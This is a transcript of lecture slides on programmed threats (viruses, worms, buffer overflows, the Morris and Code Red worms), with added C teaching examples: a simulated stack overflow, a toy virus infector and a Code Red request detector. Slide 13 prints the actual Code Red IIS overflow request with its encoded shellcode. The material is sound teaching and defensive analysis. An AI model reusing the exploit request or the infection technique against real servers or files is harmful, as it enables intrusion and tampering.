
Programmed Threats Richard Newman


Presentation Transcript


  1. Programmed Threats, Richard Newman

  2. What is a Programmed Threat?
  A potential source of harm from computer code. It may take the form of:
  - An executable program
  - Executable code attached to another program
  - Executable code pushed onto the stack of a running process
  - A standalone script
  - Commands run on startup of a program
  - Commands embedded in a "non-executable" file
    • JPEG
    • PostScript
  - Macros

  3. Examples of Programmed Threats
  1. Trojan Horse
    • Program that purports to do one thing but (also) does another
  2. Virus
    • Embedded in another program/file (the host becomes a Trojan)
    • Must get the user or system to run the program/open the file
    • Infects other files/drives
    • Hitchhikes to other file systems on its host file via removable media or email
  3. Bacteria/Rabbits
    • Replicate so fast that they use up all resources
  4. Worm
    • Stand-alone program
    • Transfers itself to the target system
    • Runs automatically on the target system (generally)

  4. More Programmed Threats
  5. Buffer overflow attack
    • "Improper" parameters (input longer than the buffer that receives it) corrupt the stack
    • The input includes executable code
    • The return pointer in the activation frame may be changed to point to that code
  6. SQL Injection
    • Interpretable commands included in user input that is concatenated into an SQL query
    • The SQL engine executes the malicious commands as part of the query
  7. Run command script
    • Malicious commands included in an .rc (or similar startup) file
    • Commands are executed when the program is started
  8. Back Door/Trap Door
    • "Secret" way to get access to a system
    • May be included for field technicians or administrators
    • See http://cm.bell-labs.com/who/ken/trust.html (Thompson, "Reflections on Trusting Trust")
    • Often the first goal of intruders
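The buffer overflow point above (a too-long parameter spills past the local buffer and onto the saved return pointer, which then points at attacker-supplied code) can be made concrete. The following is an added example, not code from the slides: it models an activation frame as a struct with a fixed buffer followed by a "return pointer" so that the adjacency is explicit and deterministic, rather than relying on a particular compiler's real stack layout. The names `copy_unchecked`, `copy_bounded`, `planted_code` and `build_overflow_input` are illustrative; `copy_unchecked` behaves like `strcpy`/`gets`, which trust the caller-supplied length.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model of an activation frame (illustrative, not a real compiler frame):
   a fixed-size local buffer immediately followed by the saved return pointer. */
typedef void (*code_ptr)(void);
struct frame {
    char buf[16];
    code_ptr ret;            /* "return address" the function jumps through */
};

static int planted_ran = 0;
static void legitimate_return(void) { /* where control should go */ }
static void planted_code(void) { planted_ran = 1; }   /* the attacker's code */

/* Vulnerable copy: trusts the supplied length, exactly like strcpy()/gets().
   Bytes beyond buf land on ret because the frame is written as raw bytes. */
static void copy_unchecked(struct frame *f, const unsigned char *in, size_t len) {
    unsigned char *p = (unsigned char *)f;       /* byte view of the whole frame */
    for (size_t i = 0; i < len; i++) p[i] = in[i];
}

/* Fixed copy: rejects input that does not fit (leaving room for the NUL). */
static int copy_bounded(struct frame *f, const unsigned char *in, size_t len) {
    if (len >= sizeof f->buf) return 0;
    memcpy(f->buf, in, len);
    f->buf[len] = '\0';
    return 1;
}

/* The "improper parameter": filler up to the return pointer, then the address
   of the attacker's code, so the spill lands exactly on ret. */
static size_t build_overflow_input(unsigned char *out, code_ptr target) {
    memset(out, 'A', offsetof(struct frame, ret));
    memcpy(out + offsetof(struct frame, ret), &target, sizeof target);
    return offsetof(struct frame, ret) + sizeof target;
}

/* Returns 1 if control flow was hijacked (planted code ran). */
int run_vulnerable(void) {
    struct frame f;
    unsigned char in[64];
    planted_ran = 0;
    f.ret = legitimate_return;
    copy_unchecked(&f, in, build_overflow_input(in, planted_code));
    f.ret();                    /* "return": jumps wherever ret now points */
    return planted_ran;
}

/* Same input through the bounded copy: the oversized parameter is refused,
   ret is untouched, and the function returns where it should. */
int run_fixed(void) {
    struct frame f;
    unsigned char in[64];
    planted_ran = 0;
    f.ret = legitimate_return;
    if (!copy_bounded(&f, in, build_overflow_input(in, planted_code)))
        fprintf(stderr, "input rejected: does not fit in buffer\n");
    f.ret();
    return planted_ran;
}

int main(void) {
    printf("unchecked copy: hijacked=%d\n", run_vulnerable());
    printf("bounded copy:   hijacked=%d\n", run_fixed());
    return 0;
}
```

The struct stands in for the frame so the demonstration is portable; on a real stack the same spill overwrites the saved return address, and defenses such as stack canaries, non-executable stacks and ASLR exist precisely to break the three steps shown here (reach the pointer, point it at code, have that code be executable).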

  5. Viruses
  1. History
    • Von Neumann's self-reproducing automata (published in the 1960s)
    • See http://en.wikipedia.org/wiki/Notable_computer_viruses_and_worms
    • First seriously appeared in the early 1980s: Elk Cloner, Brain
    • Big issue with PCs and floppy disks/bulletin boards
  2. General MO
    • Infected program is run; the viral code runs first
    • Optionally takes measures to hide
    • Looks for new files/drives to infect, and infects them
    • Does "other stuff":
      • Logic bomb
      • Time bomb
      • Password cracking
      • Install back door
      • Wreak havoc
    • Returns control to the original program

  6. Viruses
  3. Boot Sector Virus
    • Copies the boot sector (small bootstrap program) to an unused disk block
    • Overwrites the boot sector with viral code
    • Intercepts calls to the disk drive (TSR code)
    • Redirects reads of the boot sector to the copy in the other location
    • Looks for a new disk to infect whenever a disk is accessed
  4. Executable Virus
    • Adds viral code to an executable program
    • May rewrite the entry JUMP instruction to jump to the viral code first, then JUMP to the program code when done
    • May modify itself (code transformation) or modify where it is stored to evade detection (polymorphic virus)
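The executable-virus mechanics (append the viral body, redirect the entry point to it, have it jump back to the original entry so the host still works) can be shown end to end on a toy executable format. This is an added example, not code from the slides: the "image" is a byte array whose first byte is the entry offset, run by a three-instruction interpreter (`HALT`, `JMP`, `OUT`) that exists only for this demonstration. `infect_image` does what the slide describes, uses an infection marker so an already-infected host is not re-infected, and `fingerprint` is the kind of integrity check (here FNV-1a over the image) that catches the change even when the host behaves normally. All names are hypothetical.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Toy executable format: img[0] = entry offset, then code.
   Instructions: 0x00 HALT; 0x01 JMP imm8; 0x02 OUT imm8 (appends imm8 to trace). */
enum { OP_HALT = 0x00, OP_JMP = 0x01, OP_OUT = 0x02 };
#define VIRAL_MARK 0xEE            /* value the viral code emits: its infection marker */

uint8_t host[64];                  /* constructed host program: OUT 'A'; OUT 'B'; HALT */
size_t host_len;
uint8_t trace[16];

void load_host(void) {
    static const uint8_t clean[] = { 1, OP_OUT, 'A', OP_OUT, 'B', OP_HALT };
    memset(host, 0, sizeof host);
    memcpy(host, clean, sizeof clean);
    host_len = sizeof clean;
}

/* Run an image; returns the number of bytes written to trace. Bounds-checked
   and step-limited so a corrupt image cannot run away. */
size_t run_image(const uint8_t *img, size_t len, uint8_t *out, size_t cap) {
    size_t pc = img[0], n = 0, steps = 0;
    while (pc < len && steps++ < 1000) {
        switch (img[pc]) {
        case OP_HALT: return n;
        case OP_JMP:  if (pc + 1 >= len) return n; pc = img[pc + 1]; break;
        case OP_OUT:  if (pc + 1 >= len || n >= cap) return n;
                      out[n++] = img[pc + 1]; pc += 2; break;
        default:      return n;
        }
    }
    return n;
}

/* Already infected? The entry points at code that begins with OUT VIRAL_MARK. */
static int has_marker(const uint8_t *img, size_t len) {
    size_t e = img[0];
    return e + 1 < len && img[e] == OP_OUT && img[e + 1] == VIRAL_MARK;
}

/* Infect: append viral body [OUT MARK; JMP original_entry], then rewrite the
   entry so the viral code runs first and hands control back to the host.
   Returns 1 on infection, 0 if already infected or no room. */
int infect_image(uint8_t *img, size_t *len, size_t cap) {
    size_t v = *len;
    uint8_t orig_entry = img[0];
    if (has_marker(img, *len) || v + 4 > cap || v > 0xFF) return 0;
    img[v]     = OP_OUT; img[v + 1] = VIRAL_MARK;   /* the "other stuff" */
    img[v + 2] = OP_JMP; img[v + 3] = orig_entry;   /* JUMP back to the program */
    img[0] = (uint8_t)v;                            /* entry now hits viral code first */
    *len = v + 4;
    return 1;
}

/* FNV-1a over the image: an integrity baseline a scanner keeps per file. */
uint32_t fingerprint(const uint8_t *img, size_t len) {
    uint32_t h = 2166136261u;
    for (size_t i = 0; i < len; i++) { h ^= img[i]; h *= 16777619u; }
    return h;
}

int main(void) {
    load_host();
    uint32_t before = fingerprint(host, host_len);
    size_t n = run_image(host, host_len, trace, sizeof trace);
    printf("clean run: %zu bytes: %.*s\n", n, (int)n, trace);
    infect_image(host, &host_len, sizeof host);
    n = run_image(host, host_len, trace, sizeof trace);
    printf("infected run: %zu bytes, first=0x%02x then %.*s\n", n, trace[0], (int)n - 1, trace + 1);
    printf("fingerprint changed: %s\n", fingerprint(host, host_len) != before ? "yes" : "no");
    return 0;
}
```

The host's observable behaviour ("AB") is unchanged after infection, which is why file-size or behaviour checks are weak and why integrity baselines matter; the stealth techniques on the next slide are the virus's counter-moves against exactly such checks.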

  7. Viruses
  5. Macro Virus
    • Included in a "non-executable" file whose format supports macros
      • Spreadsheets
      • Document preparation software
      • Graphics editors
    • Copies its macros into other files of the same type
    • Modifies file contents so that the macros are exercised
  6. Stealth Techniques
    • Intercept system calls to modify their results (man-in-the-middle)
    • Modify system meta-information (file control block, process info)
    • Compress itself so the file size does not change
    • Modify itself
    • Encrypt the viral code

  8. Worms
  1. History
    • 1971 "Creeper" at BBN, with "Reaper" written to kill it
    • Name coined in Brunner's "The Shockwave Rider" (science fiction)
    • Xerox PARC worm for using idle workstations (1982)
    • Enabled by network/LAN technology
    • Morris worm, November 1988
    • Code Red, etc.
  2. General MO
    • Standalone program
    • Looks for a target host
    • Transfers a loader (a "micro-FTP") to the target host, which fetches the rest
    • See http://www.wormblog.com/

  9. PARC Worm
  3. Xerox PARC worm, 1982
    • Users ran a server program on their workstation when idle
    • The worm "head" found idle workstations and sent them work
    • "Segments" did the work and reported to the head
    • The head also kept backup segments
    • Had to shut down all stations to get it to stop!
    • See Shoch and Hupp, "The Worm Programs: Early Experience with a Distributed Computation," Xerox Palo Alto Research Center, 1982. http://www.cs.berkeley.edu/~prabal/resources/osprelim/SH82.pdf

  10. Morris Worm
  4. Morris worm
    • Experiment by a grad student at Cornell, November 1988
    • Looks for target hosts: random, /etc/hosts, .rhosts
    • Tried to get access via:
      • Sendmail "feature": debug mode
      • Symmetry of trust
      • Finger flaw: buffer overflow in fingerd
      • Password guessing
    • Transferred a "grappling hook" to the target host
    • The grappling hook fetched the rest of the worm and ran it
    • Overwhelmed hosts with processes
    • Overwhelmed networks

  11. Morris Worm
  4. Morris worm (cont'd)
    • Stealth techniques
      • "Encrypted" strings: each byte XORed with 0x81, which essentially flips the high bit of the ASCII
      • Changed its process name to that of an innocuous program
      • Changed process ID periodically (forked and let the parent exit): short life per process
      • Was meant to die completely after a short time
    • Sendmail access
      • Back door, poor configuration, poor interface
    • Symmetry of trust
      • Remote login without a password required
      • Each host lists the hosts it trusts
      • If host B is on A's list, host A is likely on B's list
    • See spaf.cerias.purdue.edu/tech-reps/823.pdf

  12. Code Red Worm
  5. Code Red Worm
    • July 2001
    • Attacked MS IIS
    • Buffer overflow attack
    • The patch had been available for a month
    • Spread
      • Only on the 1st to 19th of the month: look for other IIS servers
      • Did not determine whether the IIS server was vulnerable first
    • Mischief
      • Deface website: "Hacked by Chinese"
      • Launch DoS attack on the 20th to 27th of the month against a fixed IP address

  13. Code Red Worm
  5. Code Red Worm: IIS buffer overflow
    GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
    NNNNNNNNNNNNNNNNNNN
    %u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
    %u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
    %u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
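The request above is worth taking apart rather than just looking at: the run of N's is the oversized parameter, and the %uXXXX tokens are IIS's 16-bit "unicode" encoding, which the server turns into little-endian byte pairs in memory. Decoding them shows a NOP sled (0x90 bytes) and the dword 0x7801cbd3 that the overflow plants where a saved control-flow pointer used to be, which is the "return pointer in the activation frame may be changed" step from slide 4. The following is an added example, not code from the slides: it rebuilds the request from the slide as a constructed sample (224 N's, then the payload exactly as printed, including the truncated trailing "%u00=a"), decodes it, and flags the probe. `analyze_request`, `decode_percent_u` and the 100-byte filler threshold are assumptions made for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample modelled on the slide: 224 filler bytes, then the
   %u-encoded payload copied from the slide, including its malformed tail. */
#define CR_NRUN 224
static const char cr_payload[] =
    "%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801"
    "%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3"
    "%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a";
static char cr_request[512];

const char *build_code_red_request(void) {
    size_t n = 0;
    memcpy(cr_request, "GET /default.ida?", 17);               n = 17;
    memset(cr_request + n, 'N', CR_NRUN);                       n += CR_NRUN;
    memcpy(cr_request + n, cr_payload, sizeof cr_payload - 1);  n += sizeof cr_payload - 1;
    memcpy(cr_request + n, " HTTP/1.0", 9);                     n += 9;
    cr_request[n] = '\0';
    return cr_request;
}

struct cr_info {
    int is_ida_probe;       /* GET /default.ida? with an oversized filler run */
    size_t n_run;           /* length of the leading filler run */
    uint8_t code[256];      /* decoded payload bytes */
    size_t code_len;
    long malformed_at;      /* offset of the first bad %u token, -1 if none */
    uint32_t planted_addr;  /* little-endian dword at decoded offset 4 */
};
struct cr_info scratch_info;

static int hexval(int c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Decode %uXXXX tokens into little-endian byte pairs; other characters pass
   through. Stops at the first malformed token (as in the slide's "%u00=a")
   and records its offset in *bad. Returns the number of bytes produced. */
size_t decode_percent_u(const char *s, size_t len, uint8_t *out, size_t cap, long *bad) {
    size_t i = 0, o = 0;
    *bad = -1;
    while (i < len && o < cap) {
        if (s[i] == '%' && i + 1 < len && (s[i + 1] == 'u' || s[i + 1] == 'U')) {
            int h[4], k;
            if (i + 6 > len) { *bad = (long)i; break; }
            for (k = 0; k < 4; k++) h[k] = hexval((unsigned char)s[i + 2 + k]);
            if (h[0] < 0 || h[1] < 0 || h[2] < 0 || h[3] < 0) { *bad = (long)i; break; }
            if (o + 2 > cap) break;
            out[o++] = (uint8_t)(h[2] << 4 | h[3]);   /* low byte first */
            out[o++] = (uint8_t)(h[0] << 4 | h[1]);
            i += 6;
        } else {
            out[o++] = (uint8_t)s[i++];
        }
    }
    return o;
}

/* Parse one request line; returns 1 if it looks like the .ida probe. */
int analyze_request(const char *req, struct cr_info *info) {
    const char *path, *end, *q, *seg;
    memset(info, 0, sizeof *info);
    info->malformed_at = -1;
    if (strncmp(req, "GET ", 4) != 0) return 0;
    path = req + 4;
    end = strchr(path, ' ');
    if (!end) end = path + strlen(path);
    if (strncmp(path, "/default.ida?", 13) != 0) return 0;
    q = path + 13;
    while (q + info->n_run < end && q[info->n_run] == q[0]) info->n_run++;
    seg = q + info->n_run;
    info->code_len = decode_percent_u(seg, (size_t)(end - seg), info->code,
                                      sizeof info->code, &info->malformed_at);
    if (info->code_len >= 8)
        info->planted_addr = (uint32_t)info->code[4] | (uint32_t)info->code[5] << 8 |
                             (uint32_t)info->code[6] << 16 | (uint32_t)info->code[7] << 24;
    info->is_ida_probe = info->n_run >= 100;   /* assumed threshold for "oversized" */
    return info->is_ida_probe;
}

int main(void) {
    struct cr_info info;
    analyze_request(build_code_red_request(), &info);
    printf("probe=%d filler=%zu decoded=%zu bytes, planted dword=0x%08x, malformed at %ld\n",
           info.is_ida_probe, info.n_run, info.code_len, info.planted_addr, info.malformed_at);
    return 0;
}
```

Two practitioner points fall out of the decoder: the worm's "did not check whether the server was vulnerable" behaviour means an unpatched and a patched server see the identical request, so this signature is a detection for the attempt, not for compromise; and the malformed tail shows why a decoder that aborts or guesses on a truncated token, instead of reporting it, will mis-measure the payload.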
